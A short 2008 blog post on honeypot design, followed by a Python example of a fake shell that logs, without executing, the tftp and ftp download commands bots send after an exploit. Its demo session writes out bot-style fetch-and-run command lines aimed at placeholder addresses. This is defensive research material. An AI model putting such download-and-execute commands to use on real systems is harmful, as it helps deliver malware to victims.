No more emulation!
27 Aug 2008 Tillmann Werner
Emulation is an important technology in honeypots and honeynets. It’s not always what we want, though, and here’s why. As you might know, most bots perform attacks in multiple stages, i.e., they
- send some exploit code to the victim that opens a shell,
- connect to that shell or let the shell connect back,
- invoke commands to download the actual malware binary,
- execute the malware.
Catching the exploit and providing a fake shell isn’t too hard, as shown in this post. But we certainly don’t want a malware sample to get executed on our honeypot, not even in an emulated environment. Instead, we want to do different things with it, e.g., submit it to a central service for automated analysis.
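As an added example (not code from the original post or its honeypot), here is a minimal fake shell that does what the paragraph above describes: it records the download commands a bot types after the exploit stage and prepares a record for an analysis service, without ever executing anything. The command patterns, the 192.0.2.x addresses, the sample session and the record layout are constructed assumptions.

```python
import hashlib
import re
from dataclasses import dataclass, field

# Download commands bots commonly type into a captured Windows shell.
# These patterns and the sample session below are constructed for this example.
TFTP_RE = re.compile(r"tftp(?:\.exe)?\s+(?:-i\s+)?(\S+)\s+get\s+(\S+)", re.I)
FTP_OPEN_RE = re.compile(r"echo\s+open\s+(\S+)(?:\s+\d+)?\s*>>?\s*(\S+)", re.I)
FTP_GET_RE = re.compile(r"echo\s+get\s+(\S+)\s*>>?\s*(\S+)", re.I)


@dataclass
class DownloadIntent:
    proto: str
    host: str
    filename: str


@dataclass
class FakeShell:
    """Stands in for the shell an exploit would open. It only records which
    binaries the bot tries to fetch and run; nothing is ever executed."""
    intents: list = field(default_factory=list)
    ftp_scripts: dict = field(default_factory=dict)  # script path -> ftp host

    def handle_line(self, line: str) -> str:
        # Bots chain commands with '&', so inspect each one separately.
        for cmd in (c.strip() for c in line.split("&") if c.strip()):
            if m := TFTP_RE.search(cmd):
                self.intents.append(DownloadIntent("tftp", m.group(1), m.group(2)))
            elif m := FTP_OPEN_RE.search(cmd):
                self.ftp_scripts[m.group(2)] = m.group(1)
            elif m := FTP_GET_RE.search(cmd):
                host = self.ftp_scripts.get(m.group(2), "unknown")
                self.intents.append(DownloadIntent("ftp", host, m.group(1)))
        # Echo a Windows-style prompt so the bot believes the command ran.
        return "C:\\WINDOWS\\system32>"

    def wanted_binaries(self) -> list:
        return [(i.proto, i.host, i.filename) for i in self.intents]


def analysis_record(filename: str, data: bytes) -> dict:
    """Build the record a honeypot would hand to a central analysis service
    (hypothetical service; this example only prepares the record)."""
    return {"filename": filename, "size": len(data),
            "sha256": hashlib.sha256(data).hexdigest()}


if __name__ == "__main__":
    shell = FakeShell()
    shell.handle_line("tftp -i 192.0.2.5 GET sample.exe")
    shell.handle_line("echo open 192.0.2.6 21 > o&echo user a a >> o"
                      "&echo get bot.exe >> o&echo quit >> o&ftp -n -s:o&bot.exe")
    print(shell.wanted_binaries())
    print(analysis_record("bot.exe", b"MZ constructed sample"))
```

The fetch itself (tftp/ftp to the recorded host) is where a real honeypot would download the sample into a quarantine directory before calling analysis_record on the bytes.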